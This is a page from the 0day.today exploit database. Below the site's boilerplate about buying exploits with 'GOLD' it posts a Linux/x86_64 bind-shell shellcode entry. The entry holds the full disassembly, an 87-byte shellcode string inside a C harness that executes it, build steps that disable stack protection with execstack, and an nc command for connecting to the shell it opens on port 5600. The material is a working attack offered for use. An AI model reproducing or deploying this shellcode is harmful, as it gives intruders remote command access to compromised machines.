0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)
/* --------------------------------------------------------------------------------------------------- Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih Shaantih Shaantih | --------------------------------------------------------------------------------------------------- Disassembly of section .text: 0000000000400080 <.text>: 400080: 48 31 c0 xor %rax,%rax 400083: 48 31 d2 xor %rdx,%rdx 400086: 48 31 f6 xor %rsi,%rsi 400089: ff c6 inc %esi 40008b: 6a 29 pushq $0x29 40008d: 58 pop %rax 40008e: 6a 02 pushq $0x2 400090: 5f pop %rdi 400091: 0f 05 syscall 400093: 48 97 xchg %rax,%rdi 400095: 6a 02 pushq $0x2 400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp) 40009e: 54 push %rsp 40009f: 5e pop %rsi 4000a0: 52 push %rdx 4000a1: 6a 31 pushq $0x31 4000a3: 58 pop %rax 4000a4: 6a 10 pushq $0x10 4000a6: 5a pop %rdx 4000a7: 0f 05 syscall 4000a9: 5e pop %rsi 4000aa: 6a 32 pushq $0x32 4000ac: 58 pop %rax 4000ad: 0f 05 syscall 4000af: 6a 2b pushq $0x2b 4000b1: 58 pop %rax 4000b2: 0f 05 syscall 4000b4: 48 97 xchg %rax,%rdi 4000b6: 6a 03 pushq $0x3 4000b8: 5e pop %rsi 4000b9: ff ce dec %esi 4000bb: b0 21 mov $0x21,%al 4000bd: 0f 05 syscall 4000bf: 75 f8 jne 0x4000b9 4000c1: f7 e6 mul %esi 4000c3: 52 push %rdx 4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4000cb: 2f 73 68 4000ce: 53 push %rbx 4000cf: 48 8d 3c 24 lea (%rsp),%rdi 4000d3: b0 3b mov $0x3b,%al 4000d5: 0f 05 syscall --------------------------------------------------------------------------------------------------- How To Run $ gcc -o bind_shell bind_shell.c $ execstack -s bind_shell $ ./bind_shell How to Connect $ nc <HOST IP ADDRESS> 5600 Eg: $ nc 127.0.0.1 5600 --------------------------------------------------------------------------------------------------- */ #include <stdio.h> char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) sh; (int)(*func)(); } # 0day.today [2024-12-25] #